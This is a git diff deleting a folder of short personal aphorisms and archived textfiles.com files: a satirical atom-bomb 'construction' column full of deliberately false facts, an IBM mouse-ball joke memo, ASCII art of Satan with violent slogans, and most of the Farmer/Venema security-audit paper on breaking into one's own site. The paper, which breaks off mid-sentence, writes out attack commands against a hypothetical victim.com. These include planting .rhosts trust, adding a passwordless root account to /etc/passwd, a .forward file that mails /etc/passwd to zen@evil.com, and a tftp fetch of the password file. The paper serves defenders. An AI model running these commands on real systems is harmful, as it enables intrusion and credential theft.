diff options
Diffstat (limited to '.md/thoughts')
20 files changed, 0 insertions, 23709 deletions
diff --git a/.md/thoughts/txt/.description b/.md/thoughts/txt/.description deleted file mode 100644 index 82cab52..0000000 --- a/.md/thoughts/txt/.description +++ /dev/null @@ -1 +0,0 @@ -A collection of.... notes I guess? In ye old txt format diff --git a/.md/thoughts/txt/0.txt b/.md/thoughts/txt/0.txt deleted file mode 100644 index 4e1e907..0000000 --- a/.md/thoughts/txt/0.txt +++ /dev/null @@ -1 +0,0 @@ -All aphorisms are a subtle attempt at mind control. diff --git a/.md/thoughts/txt/complexity.txt b/.md/thoughts/txt/complexity.txt deleted file mode 100644 index 331b80f..0000000 --- a/.md/thoughts/txt/complexity.txt +++ /dev/null @@ -1 +0,0 @@ -Making things complex is actually a rather simple thing to do. diff --git a/.md/thoughts/txt/dystopia.txt b/.md/thoughts/txt/dystopia.txt deleted file mode 100644 index 6963b7f..0000000 --- a/.md/thoughts/txt/dystopia.txt +++ /dev/null @@ -1,2 +0,0 @@ -One of the surest ways to create a dystopia is to try to make the world -a better place. diff --git a/.md/thoughts/txt/midwit.txt b/.md/thoughts/txt/midwit.txt deleted file mode 100644 index 2a52abf..0000000 --- a/.md/thoughts/txt/midwit.txt +++ /dev/null @@ -1,2 +0,0 @@ -I have yet to encounter a smart person that uses the term -"pseudo-intellectual" diff --git a/.md/thoughts/txt/old-debates.txt b/.md/thoughts/txt/old-debates.txt deleted file mode 100644 index 0b72594..0000000 --- a/.md/thoughts/txt/old-debates.txt +++ /dev/null @@ -1,6 +0,0 @@ -*After watching an old episode of "Firing Line": -https://www.youtube.com/watch?v=Atk7V3W6oUc * - -The most depressing thing about watching arguments from the 80s and 90s -is that we're still arguing about mostly the same stuff. And even using -the same talking points. diff --git a/.md/thoughts/txt/on-being-dumb.txt b/.md/thoughts/txt/on-being-dumb.txt deleted file mode 100644 index db365fe..0000000 --- a/.md/thoughts/txt/on-being-dumb.txt +++ /dev/null @@ -1,2 +0,0 @@ -Never let the fact that you don't know how to do something stop you from -doing it. diff --git a/.md/thoughts/txt/on-immaturity.txt b/.md/thoughts/txt/on-immaturity.txt deleted file mode 100644 index 3d734f9..0000000 --- a/.md/thoughts/txt/on-immaturity.txt +++ /dev/null @@ -1,3 +0,0 @@ -I've noticed a lot of immature people tend to go on and on about how -much of an adult they are. Maturity, I've found, starts with -understanding we're all still kids really. diff --git a/.md/thoughts/txt/solution-to-social-media.txt b/.md/thoughts/txt/solution-to-social-media.txt deleted file mode 100644 index 3a51a1b..0000000 --- a/.md/thoughts/txt/solution-to-social-media.txt +++ /dev/null @@ -1,4 +0,0 @@ -Social media should be run by the government. - -Primarily, because it will make it boring and no one will ever use it -again. diff --git a/.md/thoughts/txt/textfiles.com/.description b/.md/thoughts/txt/textfiles.com/.description deleted file mode 100644 index 6c96a10..0000000 --- a/.md/thoughts/txt/textfiles.com/.description +++ /dev/null @@ -1,5 +0,0 @@ -My favorite txt files from textfiles.com. All credit of course to the -site owner Jason Scott who thanklessly maintains these historic texts. -I've changed some of the file names and extensions just so you know what -you're looking at and your browser doesn't try to download them, but the -contents are unchanged. diff --git a/.md/thoughts/txt/textfiles.com/atombomb.txt b/.md/thoughts/txt/textfiles.com/atombomb.txt deleted file mode 100644 index 596b4c7..0000000 --- a/.md/thoughts/txt/textfiles.com/atombomb.txt +++ /dev/null @@ -1,117 +0,0 @@ -File: HOW TO MAKE AN ATOM BOMB
-
- CONSTRUCTION PROJECT:
- ATOMIC BOMB
-
- The following paper is taken from The Journal of Irreproducible Results,
- Volume 25/Number 4/1979-P.O.Box 234 Chicago Heights,Illinois 60411.
-Subscriptions are 1 year for $3.70
-
-1. INTRODUCTION
-
- Worldwide controversy has been generated recently from several court
-decisions in the United States which have restricted popular magazines from
-printing articles which describe how to make an atomic bomb. The reason
-usually given by the courts is that national security would be compromised
-if such information were generally available. But, since it is commonly known
-that all of the information is publicly available in most major metropolitan
-libraries, obviously the court's officially stated position is covering up a
-more important factor; namely, that such atomic devices would prove too
-difficult for the average citizen to construct. The United States courts
-cannot afford to insult the vast majorities by insinuating that they do not
-have the intelligence of a cabbage, and thus the "official" press releases
-claim national security as a blanket restriction.
-
- The rumors that have unfortunately occurred as a result of widespread
-misinformation can (and must) be cleared up now, for the construction project
-this month is the construction of a thermonuclear device, which will hopefully
-clear up any misconceptions you might have about such a project. We will see
-how easy it is to make a device of your very own in ten easy steps, to have and
-hold as you see fit, without annoying interference from the government or the
-courts.
-
- The project will cost between $5,000 and $30,000 dollars, depending on how
-fancyyou want the final product to be. Since last week's column, "Let's Make
-a TimeMachine", was received so well in the new step-by-step format, this
-month's column will follow the same format.
-
-2. CONSTRUCTION METHOD
-
-1. First, obtain about 50 pounds (110 kg) of weapons grade Plutonium at your
-local supplier (see NOTE 1). A nuclear power plant is not recommended, as
-large quantities of missing Plutonium tends to make plant engineers unhappy.
-We suggest that you contact your local terrorist organization, or perhaps the
-Junior Achievement in your neighborhood.
-
-2. Please remember that Plutonium, especially pure, refined Plutonium, is
-somewhat dangarous. Wash your hands with soap and warm water after handling
-the material, and don't allow your children or pets to play in it or eat it.
-Any left over Plutonium dust is excellent as an insect repellant. You may wish
-to keep the substance in a lead box if you can find one in your local junk
-yard, but an old coffee can will do nIcely.
-
-3. Fashion together a metal enclosure to house the device. Most common
-varieties of sheet metal can be bent to disguise this enclosure as, for
-example, a briefcase, alunch pail, or a Buick. Do not use tinfoil.
-
-4. Arrange the Plutonium into two hemispheral shapes, separated by about 4
-cm. Use rubber cement to hold thePlutonium dust together. Gelignite is much
-better,but messier to work with. Your helpful hardware man will be happy to
-provide you withthis item.
-
-6. Pack the TNT around the hemisphere arrangement constructed in step 4. If
-you cannot find Gelignite, feel free to use TNT packed in with Playdo or any
-modeling clay. Colored clay is acceptable, but there is no need to get fancy
-at this point.
-
-7. Enclose the structure from step 6 into the enclosure made in step 3. Use
-a strong glue such as "Crazy Glue" to bind the hemisphere arrangement against
-the enclosure to prevent accidental detonation which might result from
-vibration or mishandling.
-
-8. To detonate the device, obtain a radio controlled (RC) servo mechanism, as
-found in RC model airplanes and cars. With a minimum of effort, a remote
-plunger can be made that will strike a detonator cap to effect a small
-explosion. These detonator caps can be found in the electrical supply section
-of your local supermarket. We recommend the "Blast-O-Mactic" brand because
-they are no deposit-no return.
-
-9. Now hide the completed device from the neighbors and children. The garage
-is not recommended because of high humidity and the extreme range of
-temperatures experienced there. Nuclear devices have been known to
-spontaneousLy detonate in these unstable conditions. The hall closet or under
-the kitchen sink will be perfectly suitable.
-
-10. Now you are the proud owner of a working thermonuclear device! It is a
-great ice-breaker at parties, and in a pinch, can be used for national defense.
-
-3. THEORY OF OPERATION
-
- The device basically works when the detonated TNT compresses the Plutonium
-into a critical mass. The critical mass then produces a nuclear chain reaction
-similar to the domino chain reaction (discussed in this column, "Dominos on the
-March" March, 1968). The chain reaction then promptly produces a big
-thermonuclear reaction. And there you have it, a 10 megaton explosion!
-
-4. NEXT MONTH'S COLUMN
-
- In next month's column, we will learn how to clone your neighbor's wife in
- six easy steps. This project promises to be an exciting weekend full of fun
-and profit. Common kitchen utensils will be all you need. See you next month!
-
-5. NOTES
-
-1. Plutonium (PU), atomic number 94, is a radioactive metaLlic element formed
-bythe decay of Neptunium and is similar in chemical structure to Uranium,
-Saturium, Jupiternium, and Marsium.
-
-6. PREVIOUS MONTH'S COLUMNS
-
-1. Let's Make Test Tube Babies! May, 1979
-2. Let's Make a Solar System! June, 1979
-3. Let's Make an Economic Recession! July, 1979
-4. Let's Make an Anti-Gravity Machine! August, 1979
-5. Let's Make Contact with an Alien Race! September, 1979
-
-Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
-
\ No newline at end of file diff --git a/.md/thoughts/txt/textfiles.com/balls.txt b/.md/thoughts/txt/textfiles.com/balls.txt deleted file mode 100644 index e93204e..0000000 --- a/.md/thoughts/txt/textfiles.com/balls.txt +++ /dev/null @@ -1,64 +0,0 @@ - 1990 July 12 at 11:17 EDT
-
- To: David Walker
-
- FROM: Jeff Sharpe
-
- I thought this was pretty funny. This is a true IBM ordering
- information quote from one of their catalogues. Pass it on...
-
- This is an actual alert to IBM Field Engineers that went out to
- all IBM Branch Offices. The person who wrote it was very
- serious. The rest of us may find it rather funny.
-
-
- __________________________________________________________________
-
- Abstract: Mouse Balls Available as FRU (Field Replacement Unit)
-
- Mouse balls are now available as FRU. Therefore, if a mouse
- fails to operate or should it perform erratically, it may need a
- ball replacement. Because of the delicate nature of this
- procedure, replacement of mouse balls should only be attempted by
- properly trained personnel.
-
- Before proceeding, determine the type of mouse balls by examining
- the underside of the mouse. Domestic balls will be larger and
- harder than foreign balls. Ball removal procedures differ
- depending upon manufacturer of the mouse. Foreign balls can be
- replaced using the pop-off method. Domestic balls are replaced
- using the twist-off method. Mouse balls are not usually static
- sensitive. However, excessive handling can result in sudden
- discharge. Upon completion of ball replacement, the mouse may be
- used immediately.
-
- It is recommended that each replacer have a pair of spare balls
- for maintaining optimum customer satisfaction. Any customer
- missing his balls should suspect local personnel of removing
- these necessary items.
-
- To re-order, specify one of the following:
-
- P/N 33f8462 - Domestic Mouse Balls
- P/N 33f8461 - Foreign Mouse Balls
-
-X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
-
- Another file downloaded from: NIRVANAnet(tm)
-
- & the Temple of the Screaming Electron Jeff Hunter 510-935-5845
- Rat Head Ratsnatcher 510-524-3649
- Burn This Flag Zardoz 408-363-9766
- realitycheck Poindexter Fortran 415-567-7043
- Lies Unlimited Mick Freen 415-583-4102
-
- Specializing in conversations, obscure information, high explosives,
- arcane knowledge, political extremism, diversive sexuality,
- insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
-
- Full access for first-time callers. We don't want to know who you are,
- where you live, or what your phone number is. We are not Big Brother.
-
- "Raw Data for Raw Nerves"
-
-X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
diff --git a/.md/thoughts/txt/textfiles.com/barney.txt b/.md/thoughts/txt/textfiles.com/barney.txt deleted file mode 100644 index efd0622..0000000 --- a/.md/thoughts/txt/textfiles.com/barney.txt +++ /dev/null @@ -1,58 +0,0 @@ - _oI<LIKE>=vo__ - ?/$="'" """^SATAN$~\ - .&?/' `""$$, - ,/?/' /-"^\. .-=~\T, - ,/?/' /SATAN| |<MY- ,?? - ./?/' `\?IS#' `$?FRIENDi\. - ,*?? `" ""' `b'\\$$&&\. - ,Td' `&:`H' "&7, .__ - ._. H|| . `*\H, `&$$S:7| - |???? M|, ,--&|\ `&?b ""://' - .,o--vo\,PJ'H|, H|L ``'"H?b ,-`?\ ,&&' - ,P?-""^==:=' ||b `L9, `H`&, |?:!|| ,P& - `b?\ 9/? ??H, |L *b.,'"\ :$:& H]' - `b$\o. */\. ??*b. 9. `\\:(| .,/$6d' |\T - ``\Z\\ `\7b. ,To?&b. \(\:-.-S:-~=-"'',P MJ' - `\?*b ?&&\. d\|<_ `\o_ `&&M\:SATAN>\IS,&' |LT - `\?\\ ``\?\^I/HATE@:~:$=v\. `$k<MY&PAL@%#J' HJ' - `\?\. `\b/$KIDS!-?&<?::P\\ `"^-^-?b=Sd' |\T - _o~=~$&$>==v\.??\, `\d `\$$'9P'I-LOVE=SATAN\/$$~?$\ ,R/ - /$?~^'"""""`"\\&&< ?b "`~$P:c: /v==v,#::?<<&:'T| d$/' - [|:. ""=o/&. ,P o&Z'`'.##| |MH\|| ,$$' - `=:$H&=\. `"b?b. .&' 96*.-v.:?/`\==$&?$&*' - `^$?\. `*&*\\ ,P ?~-~' |$$S>' - `\7b ,T/\&&\. d? |T' - \/b .&J' `\> d' T, - &`L /|| ?| ?, - ||9 J\T H ?, - H|| ||/ || 6 6 6 9, - ||M PJ' || 6 6 6 `H - bT, ||T || 66 666 666 || - T/L H|| `b 6 6 6 6 6 6 M - &T, M| 9, 666 666 666 9 - `L9, M| `&. | - `?*,9|| `b d - `\?(|H. `b ?b - `*\ `&. `\. J*|b - `\o/\. `&. ,P 9/L - 9:&. `9\ ?? `H9. - *?9\ `b .&' |/| - `|`\. `L ./' `|H - d\/qZbo. M .,=' ,|T - ./~&$$?=??/' `"=H$| H .o='' J\| - ,*/'' `\? `' ./?ov=="*b9, ,$P - ,Td ,$$'`' ?|M ,$/ - J|| ,$?/ M|| ?$/ - M|| |>\. ._,~9$'' T|| d'M. - 9`| `Hi:R&:&&6&="' ./$J| `^"\Z\. - ||M `=Z\:"" H|T" `&H&>v_ - bT, .. v,?|\ M|| .:Z|&\. - ||H _DEATH~>TO9H| `?*\ ?$`#'H - 9ALL|1KIDS* .$/ `bZ&\ ,o\&KILL&/' - \?$.:?ooo/*""' `\$$b_ |\MAIM*:./' - `"""' `' `~?&qDESTROY#/' - "^~DIE/" - - - - diff --git a/.md/thoughts/txt/textfiles.com/break_into_your_site.txt b/.md/thoughts/txt/textfiles.com/break_into_your_site.txt deleted file mode 100644 index 653e686..0000000 --- a/.md/thoughts/txt/textfiles.com/break_into_your_site.txt +++ /dev/null @@ -1,1120 +0,0 @@ - -_Improving the Security of Your Site by Breaking Into it_ - - - Dan Farmer Wietse Venema - - Sun Microsystems Eindhoven University of Technology - 2550 garcia ave MS PAL1-407 P.O. Box 513, 5600 MB - Mountain View CA 94043 Eindhoven, NL - - zen@sun.com wietse@wzv.win.tue.nl - - -Introduction ------------- - -Every day, all over the world, computer networks and hosts are being -broken into. The level of sophistication of these attacks varies -widely; while it is generally believed that most break-ins succeed due -to weak passwords, there are still a large number of intrusions that use -more advanced techniques to break in. Less is known about the latter -types of break-ins, because by their very nature they are much harder to -detect. - ------ - -CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. -Purdue. Sun. You name it, we've seen it broken into. Anything that is -on the Internet (and many that isn't) seems to be fairly easy game. Are -these targets unusual? What happened? - -Fade to... - -A young boy, with greasy blonde hair, sitting in a dark room. The room -is illuminated only by the luminescense of the C64's 40 character -screen. Taking another long drag from his Benson and Hedges cigarette, -the weary system cracker telnets to the next faceless ".mil" site on his -hit list. "guest -- guest", "root -- root", and "system -- manager" all -fail. No matter. He has all night... he pencils the host off of his -list, and tiredly types in the next potential victim... - -This seems to be the popular image of a system cracker. Young, -inexperienced, and possessing vast quantities of time to waste, to get -into just one more system. However, there is a far more dangerous type -of system cracker out there. One who knows the ins and outs of the -latest security auditing and cracking tools, who can modify them for -specific attacks, and who can write his/her own programs. One who not -only reads about the latest security holes, but also personally -discovers bugs and vulnerabilities. A deadly creature that can both -strike poisonously and hide its tracks without a whisper or hint of a -trail. The uebercracker is here. - ------ - -Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's -uebermensch, or, literally translated into English, "over man." -Nietzsche used the term not to refer to a comic book superman, but -instead a man who had gone beyond the incompetence, pettiness, and -weakness of the everyday man. The uebercracker is therefore the system -cracker who has gone beyond simple cookbook methods of breaking into -systems. An uebercracker is not usually motivated to perform random -acts of violence. Targets are not arbitrary -- there is a purpose, -whether it be personal monetary gain, a hit and run raid for -information, or a challenge to strike a major or prestigious site or -net.personality. An uebercracker is hard to detect, harder to stop, and -hardest to keep out of your site for good. - -Overview --------- - -In this paper we will take an unusual approach to system security. -Instead of merely saying that something is a problem, we will look -through the eyes of a potential intruder, and show _why_ it is one. We -will illustrate that even seemingly harmless network services can become -valuable tools in the search for weak points of a system, even when -these services are operating exactly as they are intended to. - -In an effort to shed some light on how more advanced intrusions occur, -this paper outlines various mechanisms that crackers have actually used -to obtain access to systems and, in addition, some techniques we either -suspect intruders of using, or that we have used ourselves in tests or -in friendly/authorized environments. - -Our motivation for writing this paper is that system administrators are -often unaware of the dangers presented by anything beyond the most -trivial attacks. While it is widely known that the proper level of -protection depends on what has to be protected, many sites appear to -lack the resources to assess what level of host and network security is -adequate. By showing what intruders can do to gain access to a remote -site, we are trying to help system administrators to make _informed_ -decisions on how to secure their site -- or not. We will limit the -discussion to techniques that can give a remote intruder access to a -(possibly non-interactive) shell process on a UNIX host. Once this is -achieved, the details of obtaining root privilege are beyond the scope -of this work -- we consider them too site-dependent and, in many cases, -too trivial to merit much discussion. - -We want to stress that we will not merely run down a list of bugs or -security holes -- there will always be new ones for a potential attacker -to exploit. The purpose of this paper is to try to get the reader to -look at her or his system in a new way -- one that will hopefully afford -him or her the opportunity to _understand_ how their system can be -compromised, and how. - -We would also like to reiterate to the reader that the purpose of this -paper is to show you how to test the security of your own site, not how -to break into other people's systems. The intrusion techniques we -illustrate here will often leave traces in your system auditing logs -- -it might be constructive to examine them after trying some of these -attacks out, to see what a real attack might look like. Certainly other -sites and system administrators will take a very dim view of your -activities if you decide to use their hosts for security testing without -advance authorization; indeed, it is quite possible that legal action -may be pursued against you if they perceive it as an attack. - -There are four main parts to the paper. The first part is the -introduction and overview. The second part attempts to give the reader -a feel for what it is like to be an intruder and how to go from knowing -nothing about a system to compromising its security. This section goes -over actual techniques to gain information and entrance and covers basic -strategies such as exploiting trust and abusing improperly configured -basic network services (ftp, mail, tftp, etc.) It also discusses -slightly more advanced topics, such as NIS and NFS, as well as various -common bugs and configuration problems that are somewhat more OS or -system specific. Defensive strategies against each of the various -attacks are also covered here. - -The third section deals with trust: how the security of one system -depends on the integrity of other systems. Trust is the most complex -subject in this paper, and for the sake of brevity we will limit the -discussion to clients in disguise. - -The fourth section covers the basic steps that a system administrator -may take to protect her or his system. Most of the methods presented -here are merely common sense, but they are often ignored in practice -- -one of our goals is to show just how dangerous it can be to ignore basic -security practices. - -Case studies, pointers to security-related information, and software are -described in the appendices at the end of the paper. - -While exploring the methods and strategies discussed in this paper we we -wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in -shell, perl, expect and C, it examines a remote host or set of hosts and -gathers as much information as possible by remotely probing NIS, finger, -NFS, ftp and tftp, rexd, and other services. This information includes -the presence of various network information services as well as -potential security flaws -- usually in the form of incorrectly setup or -configured network services, well-known bugs in system or network -utilities, or poor or ignorant policy decisions. It then can either -report on this data or use an expert system to further investigate any -potential security problems. While SATAN doesn't use all of the methods -that we discuss in the paper, it has succeeded with ominous regularity -in finding serious holes in the security of Internet sites. It will be -posted and made available via anonymous ftp when completed; Appendix A -covers its salient features. - -Note that it isn't possible to cover all possible methods of breaking -into systems in a single paper. Indeed, we won't cover two of the most -effective methods of breaking into hosts: social engineering and -password cracking. The latter method is so effective, however, that -several of the strategies presented here are geared towards acquiring -password files. In addition, while windowing systems (X, OpenWindows, -etc.) can provide a fertile ground for exploitation, we simply don't -know many methods that are used to break into remote systems. Many -system crackers use non-bitmapped terminals which can prevent them from -using some of the more interesting methods to exploit windowing systems -effectively (although being able to monitor the victim's keyboard is -often sufficient to capture passwords). Finally, while worms, viruses, -trojan horses, and other malware are very interesting, they are not -common (on UNIX systems) and probably will use similar techniques to the -ones we describe in this paper as individual parts to their attack -strategy. - -Gaining Information -------------------- - -Let us assume that you are the head system administrator of Victim -Incorporated's network of UNIX workstations. In an effort to secure -your machines, you ask a friendly system administrator from a nearby -site (evil.com) to give you an account on one of her machines so that -you can look at your own system's security from the outside. - -What should you do? First, try to gather information about your -(target) host. There is a wealth of network services to look at: -finger, showmount, and rpcinfo are good starting points. But don't stop -there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, -and as many other services as you can find. There are so many methods -and techniques that space precludes us from showing all of them, but we -will try to show a cross-section of the most common and/or dangerous -strategies that we have seen or have thought of. Ideally, you would -gather such information about all hosts on the subnet or area of attack --- information is power -- but for now we'll examine only our intended -target. - -To start out, you look at what the ubiquitous finger command shows you -(assume it is 6pm, Nov 6, 1993): - - victim % finger @victim.com - [victim.com] - Login Name TTY Idle When Where - zen Dr. Fubar co 1d Wed 08:00 death.com - -Good! A single idle user -- it is likely that no one will notice if you -actually manage to break in. - -Now you try more tactics. As every finger devotee knows, fingering "@", -"0", and "", as well as common names, such as root, bin, ftp, system, -guest, demo, manager, etc., can reveal interesting information. What -that information is depends on the version of finger that your target is -running, but the most notable are account names, along with their home -directories and the host that they last logged in from. - -To add to this information, you can use rusers (in particular with the --l flag) to get useful information on logged-in users. - -Trying these commands on victim.com reveals the following information, -presented in a compressed tabular form to save space: - - Login Home-dir Shell Last login, from where - ----- -------- ----- ---------------------- - root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com - bin /bin Never logged in - nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co - daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com - sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com - zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com - sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com - guest /export/foo /bin/sh Never logged in - ftp /home/ftp Never logged in - -Both our experiments with SATAN and watching system crackers at work -have proved to us that finger is one of the most dangerous services, -because it is so useful for investigating a potential target. However, -much of this information is useful only when used in conjunction with -other data. - -For instance, running showmount on your target reveals: - - evil % showmount -e victim.com - export list for victim.com: - /export (everyone) - /var (everyone) - /usr easy - /export/exec/kvm/sun4c.sunos.4.1.3 easy - /export/root/easy easy - /export/swap/easy easy - -Note that /export/foo is exported to the world; also note that this is -user guest's home directory. Time for your first break-in! In this -case, you'll mount the home directory of user "guest." Since you don't -have a corresponding account on the local machine and since root cannot -modify files on an NFS mounted filesystem, you create a "guest" account -in your local password file. As user guest you can put an .rhosts entry -in the remote guest home directory, which will allow you to login to the -target machine without having to supply a password. - - evil # mount victim.com:/export/foo /foo - evil # cd /foo - evil # ls -lag - total 3 - 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . - 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. - 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest - evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd - evil # ls -lag - total 3 - 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . - 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. - 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest - evil # su guest - evil % echo evil.com >> guest/.rhosts - evil % rlogin victim.com - Welcome to victim.com! - victim % - -If, instead of home directories, victim.com were exporting filesystems -with user commands (say, /usr or /usr/local/bin), you could replace a -command with a trojan horse that executes any command of your choice. -The next user to execute that command would execute your program. - -We suggest that filesystems be exported: - -o Read/write only to specific, trusted clients. -o Read-only, where possible (data or programs can often be - exported in this manner.) - -If the target has a "+" wildcard in its /etc/hosts.equiv (the default in -various vendor's machines) or has the netgroups bug (CERT advisory -91:12), any non-root user with a login name in the target's password -file can rlogin to the target without a password. And since the user -"bin" often owns key files and directories, your next attack is to try -to log in to the target host and modify the password file to let you -have root access: - - evil % whoami - bin - evil % rsh victim.com csh -i - Warning: no access to tty; thus no job control in this shell... - victim % ls -ldg /etc - drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc - victim % cd /etc - victim % mv passwd pw.old - victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd - victim % ^D - evil % rlogin victim.com -l toor - Welcome to victim.com! - victim # - -A few notes about the method used above; "rsh victim.com csh -i" is used -to initially get onto the system because it doesn't leave any traces in -the wtmp or utmp system auditing files, making the rsh invisible for -finger and who. The remote shell isn't attached to a pseudo-terminal, -however, so that screen-oriented programs such as pagers and editors -will fail -- but it is very handy for brief exploration. - -The COPS security auditing tool (see appendix D) will report key files -or directories that are writable to accounts other than the -superuser. If you run SunOS 4.x you can apply patch 100103 to fix most -file permission problems. On many systems, rsh probes as shown above, -even when successful, would remain completely unnoticed; the tcp wrapper -(appendix D), which logs incoming connections, can help to expose such -activities. - ----- - -What now? Have you uncovered all the holes on your target system? Not -by a long shot. Going back to the finger results on your target, you -notice that it has an "ftp" account, which usually means that anonymous -ftp is enabled. Anonymous ftp can be an easy way to get access, as it -is often misconfigured. For example, the target may have a complete -copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory -instead of a stripped down version. In this example, though, you see -that the latter doesn't seem to be true (how can you tell without -actually examining the file?) However, the home directory of ftp on -victim.com is writable. This allows you to remotely execute a command --- in this case, mailing the password file back to yourself -- by the -simple method of creating a .forward file that executes a command when -mail is sent to the ftp account. This is the same mechanism of piping -mail to a program that the "vacation" program uses to automatically -reply to mail messages. - - evil % cat forward_sucker_file - "|/bin/mail zen@evil.com < /etc/passwd" - - evil % ftp victim.com - Connected to victim.com - 220 victim FTP server ready. - Name (victim.com:zen): ftp - 331 Guest login ok, send ident as password. - Password: - 230 Guest login ok, access restrictions apply. - ftp> ls -lga - 200 PORT command successful. - 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). - total 5 - drwxr-xr-x 4 101 1 512 Jun 20 1991 . - drwxr-xr-x 4 101 1 512 Jun 20 1991 .. - drwxr-xr-x 2 0 1 512 Jun 20 1991 bin - drwxr-xr-x 2 0 1 512 Jun 20 1991 etc - drwxr-xr-x 3 101 1 512 Aug 22 1991 pub - 226 ASCII Transfer complete. - 242 bytes received in 0.066 seconds (3.6 Kbytes/s) - ftp> put forward_sucker_file .forward - 43 bytes sent in 0.0015 seconds (28 Kbytes/s) - ftp> quit - evil % echo test | mail ftp@victim.com - -Now you simply wait for the password file to be sent back to you. - -The security auditing tool COPS will check your anonymous ftp setup; see -the man page for ftpd, the documentation/code for COPS, or CERT advisory -93:10 for information on how to set up anonymous ftp correctly. -Vulnerabilities in ftp are often a matter of incorrect ownership or -permissions of key files or directories. At the very least, make sure -that ~ftp and all "system" directories and files below ~ftp are owned by -root and are not writable by any user. - -While looking at ftp, you can check for an older bug that was once -widely exploited: - - % ftp -n - ftp> open victim.com - Connected to victim.com - 220 victim.com FTP server ready. - ftp> quote user ftp - 331 Guest login ok, send ident as password. - ftp> quote cwd ~root - 530 Please login with USER and PASS. - ftp> quote pass ftp - 230 Guest login ok, access restrictions apply. - ftp> ls -al / (or whatever) - -If this works, you now are logged in as root, and able to modify the -password file, or whatever you desire. If your system exhibits this -bug, you should definitely get an update to your ftpd daemon, either -from your vendor or (via anon ftp) from ftp.uu.net. - -The wuarchive ftpd, a popular replacement ftp daemon put out by the -Washington University in Saint Louis, had almost the same problem. If -your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a -more recent version. - -Finally, there is a program vaguely similar to ftp -- tftp, or the -trivial file transfer program. This daemon doesn't require any password -for authentication; if a host provides tftp without restricting the -access (usually via some secure flag set in the inetd.conf file), an -attacker can read and write files anywhere on the system. In the -example, you get the remote password file and place it in your local -/tmp directory: - - evil % tftp - tftp> connect victim.com - tftp> get /etc/passwd /tmp/passwd.victim - tftp> quit - -For security's sake, tftp should not be run; if tftp is necessary, use -the secure option/flag to restrict access to a directory that has no -valuable information, or run it under the control of a chroot wrapper -program. - ----- - -If none of the previous methods have worked, it is time to go on to more -drastic measures. You have a friend in rpcinfo, another very handy -program, sometimes even more useful than finger. Many hosts run RPC -services that can be exploited; rpcinfo can talk to the portmapper and -show you the way. It can tell you if the host is running NIS, if it is -a NIS server or slave, if a diskless workstation is around, if it is -running NFS, any of the info services (rusersd, rstatd, etc.), or any -other unusual programs (auditing or security related). For instance, -going back to our sample target: - - evil % rpcinfo -p victim.com [output trimmed for brevity's sake] - program vers proto port - 100004 2 tcp 673 ypserv - 100005 1 udp 721 mountd - 100003 2 udp 2049 nfs - 100026 1 udp 733 bootparam - 100017 1 tcp 1274 rexd - -In this case, you can see several significant facts about our target; -first of which is that it is an NIS server. It is perhaps not widely -known, but once you know the NIS domainname of a server, you can get any -of its NIS maps by a simple rpc query, even when you are outside the -subnet served by the NIS server (for example, using the YPX program that -can be found in the comp.sources.misc archives on ftp.uu.net). In -addition, very much like easily guessed passwords, many systems use -easily guessed NIS domainnames. Trying to guess the NIS domainname is -often very fruitful. Good candidates are the fully and partially -qualified hostname (e.g. "victim" and "victim.com"), the organization -name, netgroup names in "showmount" output, and so on. If you wanted to -guess that the domainname was "victim", you could type: - - evil % ypwhich -d victim victim.com - Domain victim not bound. - -This was an unsuccessful attempt; if you had guessed correctly it would -have returned with the host name of victim.com's NIS server. However, -note from the NFS section that victim.com is exporting the "/var" -directory to the world. All that is needed is to mount this directory -and look in the "yp" subdirectory -- among other things you will see -another subdirectory that contains the domainname of the target. - - evil # mount victim.com:/var /foo - evil # cd /foo - evil # /bin/ls -alg /foo/yp - total 17 - 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 . - 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 .. - 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile - 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding - 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar - [...] - -In this case, "foo_bar" is the NIS domain name. - -In addition, the NIS maps often contain a good list of user/employee -names as well as internal host lists, not to mention passwords for -cracking. - -Appendix C details the results of a case study on NIS password files. - ----- - -You note that the rpcinfo output also showed that victim.com runs rexd. -Like the rsh daemon, rexd processes requests of the form "please execute -this command as that user". Unlike rshd, however, rexd does not care if -the client host is in the hosts.equiv or .rhost files. Normally the rexd -client program is the "on" command, but it only takes a short C program -to send arbitrary client host and userid information to the rexd server; -rexd will happily execute the command. For these reasons, running rexd -is similar to having no passwords at all: all security is in the client, -not in the server where it should be. Rexd security can be improved -somewhat by using secure RPC. - ----- - -While looking at the output from rpcinfo, you observe that victim.com -also seems to be a server for diskless workstations. This is evidenced -by the presence of the bootparam service, which provides information to -the diskless clients for booting. If you ask nicely, using -BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get -its 